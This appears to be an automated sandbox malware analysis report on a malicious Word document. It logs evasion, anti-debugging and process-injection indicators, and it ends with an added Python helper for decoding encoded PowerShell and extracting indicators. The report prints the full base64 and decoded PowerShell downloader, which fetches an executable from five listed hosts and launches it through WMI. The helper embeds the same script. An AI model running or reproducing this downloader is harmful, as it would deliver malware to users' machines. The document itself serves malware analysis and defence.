Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......'..._._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...D...T...........................'.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......'..............ul..................u..0.....D...T...........................'.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......+..._._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........+.......L...>...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......+..............ul..................u..0.....D...T...........................+.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l......./..._._.R.E.L.P.A.T.H. . . . . . . . .:. ...D...T.........................../.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l......./..............ul..................u..0.....D...T.........................../.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......3..._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.D...T...........................3.......L...(...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......3..............ul..................u..0.....D...T.......(...................3.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......7..._._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}...T.......7...................7.......L...*...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......7..............ul..................u..0.....D...T.......@...................7.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......;..._._.S.E.R.V.E.R. . . . . . . . . .:. ...D...T.......N...................;.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......;..............ul..................u..0.....D...T.......W...................;.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......?..._._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...D...T.......e...................?.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......?..............ul..................u..0.....D...T.......n...................?.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......C..._._.P.A.T.H. . . . . . . . . . . .:. ...D...T.......|...................C.......L...&...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......C..............ul..................u..0.....D...T...........................C.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......G...P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.4.9.6...........................G.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......G..............ul..................u..0.....D...T...........................G.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......K...R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.D...T...........................K.......L...(...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......K..............ul..................u..0.....D...T...........................K.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................O.......|......u...................u..0.....D...T...........................O...............>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........L.......S..............uL..................u..0.....D...T...........................S.......,.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........L.......W..............uL..................u..0.....D...T...........................W.......,.......>..u........
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\317.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\UXInit\UXInit.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: form.docVirustotal: Detection: 62%
Source: form.docReversingLabs TitaniumCloud: Detection: 54%
Spawns processes
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAG8AbQBiAHcAYgBvAGMAZwBwAGgAYQBmAD0AJwBRAGsAeQBkAHMAZwBlAHIAagBqAGYAJwA7ACQAUgBxAGsAbQBxAGEAcABsAHcAIAA9ACAAJwAzADEANwAnADsAJABNAG0AZgBmAGYAYQBpAHQAbABoAHMAPQAnAE8AcwBqAHEAZgBlAGEAawBmAG0AcwBsACcAOwAkAFIAeABnAG4AZAB1AGMAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBxAGsAbQBxAGEAcABsAHcAKwAnAC4AZQB4AGUAJwA7ACQAWABjAHMAcQB0AHgAbQB1AGMAYgB1AD0AJwBIAHcAeQBxAGsAZQBtAHAAeQAnADsAJABaAGEAcgBuAG4AYgBsAHcAdgB0AGkAbQA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASQB6AG0AdwB4AGIAeQB1AGMAegA9ACcAaAB0AHQAcAA6AC8ALwBzAHAAbwByAHQAbgBhAGwALgBhAHoAdQByAGUAdwBlAGIAcwBpAHQAZQBzAC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBYAHoAbwBvAC8AKgBoAHQAdABwADoALwAvAHQAZQBlAG8ALgBoAGkAZwBoAG8AbgBpAG4AZgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAHQAeAAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBiAGwAdQBlAGIAZQBhAHIAeQBoAGkAbABsAHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAMAA3AC8AKgBoAHQAdABwADoALwAvAHQAaABlAG0AZQBmAG8AbABrAHMALgBjAG8AbQAvAHQAcgBlAG4AZAB6AGIAZAAvAG8AYQBHAFoAQwBWAHMASgAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBoAG8AdABlAGMAaABzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAOABtADYALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAZABwAGYAaAB6AG4AdQBvAG0AbAByAD0AJwBaAHEAZwB1AHAAaQB2AGYAdwB0AG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAcAB1AGgAcQBiAHgAYgAgAGkAbgAgACQASQB6AG0AdwB4AGIAeQB1AGMAegApAHsAdAByAHkAewAkAFoAYQByAG4AbgBiAGwAdwB2AHQAaQBtAC4AIgBkAGAAbwB3AG4AbABvAGEAZABGAGAASQBMAGUAIgAoACQAQQBwAHUAaABxAGIAeABiACwAIAAkAFIAeABnAG4AZAB1AGMAdwApADsAJABIAGgAZQB4AHkAZAB6AHEAcQBoAGcAbQBkAD0AJwBMAHUAdwBmAGUAYQBsAG4AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHgAZwBuAGQAdQBjAHcAKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAyADQANgAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAEEAYABUAGUAIgAoACQAUgB4AGcAbgBkAHUAYwB3ACkAOwAkAFIA
eAB1AGcAdwByAGEAZABnAG4APQAnAE0AbgB1AGEAaQBqAHoAaABtAHQAdgAnADsAYgByAGUAYQBrADsAJABYAGkAYgB2AHYAdAB5AGMAPQAnAEMAdwBqAGwAbwBtAHoAaABtAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBrAGEAYwBlAGcAbgB3AHgAYgA9ACcAWQBqAHkAaABsAHUAbABtAHgAJwA=
Source: unknownProcess created: C:\Users\user\317.exe C:\Users\user\317.exe
Source: unknownProcess created: C:\Windows\System32\UXInit\UXInit.exe C:\Windows\system32\UXInit\UXInit.exe
Source: C:\Users\user\317.exeProcess created: C:\Windows\System32\UXInit\UXInit.exe C:\Windows\system32\UXInit\UXInit.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\317.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: c:\Users\User\Desktop\2005\6.2.20\ScrollerCtrl_demo\ScrollerTest\Release\ScrollerTest.pdb source: 317.exe, UXInit.exe, 00000004.00000002.1383142615.00401000.00000040.00020000.sdmp

Data Obfuscation:

PowerShell case anomaly found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e …
Contains functionality to dynamically determine API calls
Source: C:\Users\user\317.exeCode function: 3_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\317.exeCode function: 3_2_0043CB3B push ecx; ret
Source: C:\Users\user\317.exeCode function: 3_2_0043D669 push ecx; ret
Source: C:\Users\user\317.exeCode function: 3_2_00209A9D push ecx; retf
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00209A9D push ecx; retf

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\317.exeExecutable created and started: C:\Windows\System32\UXInit\UXInit.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\317.exeFile opened: C:\Windows\system32\UXInit\UXInit.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\317.exeCode function: 3_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
Source: C:\Users\user\317.exeCode function: 3_2_0040C2A0 IsIconic,
Source: C:\Users\user\317.exeCode function: 3_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\317.exeCode function: 3_2_0042D6B9 IsWindowVisible,IsIconic,
Source: C:\Users\user\317.exeCode function: 3_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\317.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\UXInit\UXInit.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\317.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\UXInit\UXInit.exeWindow / User API: threadDelayed 782
Found evasive API chain (date check)
Source: C:\Users\user\317.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\317.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\317.exeAPI coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2432Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\317.exe TID: 2544Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\UXInit\UXInit.exe TID: 2652Thread sleep count: 782 > 30
Source: C:\Windows\System32\UXInit\UXInit.exe TID: 2652Thread sleep time: -46920000s >= -30000s
Source: C:\Windows\System32\UXInit\UXInit.exe TID: 2652Thread sleep time: -60000s >= -30000s
Checks the free space of harddrives
Source: C:\Users\user\317.exeFile Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\317.exeCode function: 3_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,
Source: C:\Users\user\317.exeCode function: 3_2_0042FC18 lstrlen,FindFirstFileA,FindClose,
Source: C:\Users\user\317.exeCode function: 3_2_002130C0 FindNextFileW,FindFirstFileW,FindClose,
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Program exit points
Source: C:\Users\user\317.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\317.exeCode function: 3_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Contains functionality to dynamically determine API calls
Source: C:\Users\user\317.exeCode function: 3_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
Contains functionality to read the PEB
Source: C:\Users\user\317.exeCode function: 3_2_00403040 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00200467 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00202F7F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00203D1F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_002143E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\317.exeCode function: 3_2_00213640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00203D1F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00200467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00202F7F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00213640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_002143E0 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\317.exeCode function: 3_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\317.exeCode function: 3_2_00444764 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\317.exeCode function: 3_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\317.exeCode function: 3_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\317.exeCode function: 3_2_00444786 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\317.exeCode function: 3_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: form.docOLE indicator, VBA stomping: true
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded $Rombwbocgphaf='Qkydsgerjjf';$Rqkmqaplw = '317';$Mmfffaitlhs='Osjqfeakfmsl';$Rxgnducw=$env:userprofile+'\'+$Rqkmqaplw+'.exe';$Xcsqtxmucbu='Hwyqkempy';$Zarnnblwvtim=.('n'+'ew'+'-object') nEt.webClIENT;$Izmwxbyucz='http://sportnal.azurewebsites.net/calendar/Xzoo/*http://teeo.highoninfo.com/wp-admin/1tx/*http://thebluebearyhillproject.com/wp-admin/q07/*http://themefolks.com/trendzbd/oaGZCVsJ/*http://techotechsolution.com/wp-admin/W8m6/'."s`plit"([char]42);$Adpfhznuomlr='Zqgupivfwto';foreach($Apuhqbxb in $Izmwxbyucz){try{$Zarnnblwvtim."d`ownloadF`ILe"($Apuhqbxb, $Rxgnducw);$Hhexydzqqhgmd='Luwfealn';If ((.('Get-'+'It'+'em') $Rxgnducw)."L`eNgtH" -ge 24611) {([wmiclass]'win32_Process')."CREA`Te"($Rxgnducw);$Rxugwradgn='Mnuaijzhmtv';break;$Xibvvtyc='Cwjlomzhmb'}}catch{}}$Rkacegnwxb='Yjyhlulmx'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\317.exeProcess created: C:\Windows\System32\UXInit\UXInit.exe C:\Windows\system32\UXInit\UXInit.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e 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
May try to detect the Windows Explorer process (often used for injection)
Source: UXInit.exe, 00000004.00000002.1383279756.00710000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: UXInit.exe, 00000004.00000002.1383279756.00710000.00000002.00000001.sdmpBinary or memory string: Progman
Source: UXInit.exe, 00000004.00000002.1383279756.00710000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
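Added example, not part of the Joe Sandbox report: a Python triage helper that does what the "Encoded PowerShell command line" entry above shows the sandbox doing. It decodes a `powershell -e` argument (base64 of the UTF-16LE script), strips the backtick and `'a'+'b'` string-concatenation obfuscation, and pulls out the download URL list (split on `[char]42`, i.e. `*`), the drop path under `%USERPROFILE%`, the 24611-byte size gate and the `Win32_Process.Create` launch. Because the document's VBA source stream is stomped, the decoded command line rather than the macro text is the first reliable view of this payload. The input is the decoded script quoted above, re-encoded here because the original base64 blob is not reproduced on this page; the function names, the escape table and the regular expressions are this example's own.

```python
import base64
import re

# Constructed input: the decoded downloader quoted in the report, re-encoded the way
# "powershell -e" expects it (UTF-16LE, then base64). The original blob is not on the page.
DECODED_SCRIPT = r"""$Rombwbocgphaf='Qkydsgerjjf';$Rqkmqaplw = '317';$Mmfffaitlhs='Osjqfeakfmsl';$Rxgnducw=$env:userprofile+'\'+$Rqkmqaplw+'.exe';$Xcsqtxmucbu='Hwyqkempy';$Zarnnblwvtim=.('n'+'ew'+'-object') nEt.webClIENT;$Izmwxbyucz='http://sportnal.azurewebsites.net/calendar/Xzoo/*http://teeo.highoninfo.com/wp-admin/1tx/*http://thebluebearyhillproject.com/wp-admin/q07/*http://themefolks.com/trendzbd/oaGZCVsJ/*http://techotechsolution.com/wp-admin/W8m6/'."s`plit"([char]42);$Adpfhznuomlr='Zqgupivfwto';foreach($Apuhqbxb in $Izmwxbyucz){try{$Zarnnblwvtim."d`ownloadF`ILe"($Apuhqbxb, $Rxgnducw);$Hhexydzqqhgmd='Luwfealn';If ((.('Get-'+'It'+'em') $Rxgnducw)."L`eNgtH" -ge 24611) {([wmiclass]'win32_Process')."CREA`Te"($Rxgnducw);$Rxugwradgn='Mnuaijzhmtv';break;$Xibvvtyc='Cwjlomzhmb'}}catch{}}$Rkacegnwxb='Yjyhlulmx'"""

SAMPLE_CMDLINE = "powersheLL -e " + base64.b64encode(
    DECODED_SCRIPT.encode("utf-16le")).decode("ascii")

# -e, -ec, -enc, -EncodedCommand: powershell.exe accepts any unambiguous prefix.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Escapes Windows PowerShell 5.1 honours after a backtick inside double quotes. Any other
# character is passed through unchanged, which is why "d`ownloadF`ILe" is just DownloadFile.
# PowerShell 6+ also maps `e to ESC, so "L`eNgtH" in this sample would not resolve on pwsh.
BACKTICK_ESCAPES = {"0": "\0", "a": "\a", "b": "\b", "f": "\f",
                    "n": "\n", "r": "\r", "t": "\t", "v": "\v"}


def decode_encoded_command(cmdline):
    """Return the script behind -e/-enc/-EncodedCommand, or None if the flag is absent."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")


def strip_backticks(script):
    """Resolve backtick escapes; letters that are not escapes fall through unchanged."""
    return re.sub(r"`(.)", lambda m: BACKTICK_ESCAPES.get(m.group(1), m.group(1)), script)


def join_literals(script):
    """Collapse 'a'+'b'+'c' into 'abc' (single-quoted literals are never interpolated)."""
    pat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != script:
        prev, script = script, pat.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), script)
    return script


def extract_iocs(script):
    """Pull URL list, drop path, size gate and launch method out of the deobfuscated script."""
    s = join_literals(strip_backticks(script))
    # $name='literal' assignments, used to resolve variables inside the drop path expression
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", s))
    urls = []
    m = re.search(r"'([^']*)'\s*\.\s*\"?split\"?\s*\(\s*\[char\]\s*(\d+)\s*\)", s, re.I)
    if m:
        urls = [u for u in m.group(1).split(chr(int(m.group(2)))) if u]
    drop = None
    m = re.search(r"\$env:userprofile((?:\s*\+\s*(?:'[^']*'|\$\w+))+)", s, re.I)
    if m:
        parts = re.findall(r"'([^']*)'|\$(\w+)", m.group(1))
        drop = "%USERPROFILE%" + "".join(
            literals.get(var, "$" + var) if var else lit for lit, var in parts)
    m = re.search(r"-ge\s+(\d+)", s)
    min_size = int(m.group(1)) if m else None
    # Win32_Process.Create launches the drop under WmiPrvSE.exe, not under powershell.exe
    wmi = re.search(r"\[wmiclass\]'win32_process'\)?\s*\.\s*\"?create", s, re.I) is not None
    return {"urls": urls, "drop_path": drop, "min_size": min_size, "wmi_launch": wmi}


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(decode_encoded_command(SAMPLE_CMDLINE)), indent=2))
```

The size gate matters for triage: the loop only executes a download that is at least 24611 bytes, so a payload host that answers with a short error page is silently skipped and the next URL is tried, which is why all five hosts belong on the block list even though only some were contacted during this run.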

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\317.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\user\317.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\317.exeCode function: EnumSystemLocalesA,
Source: C:\Users\user\317.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\317.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\317.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,
Source: C:\Users\user\317.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\user\317.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
Source: C:\Users\user\317.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Users\user\317.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
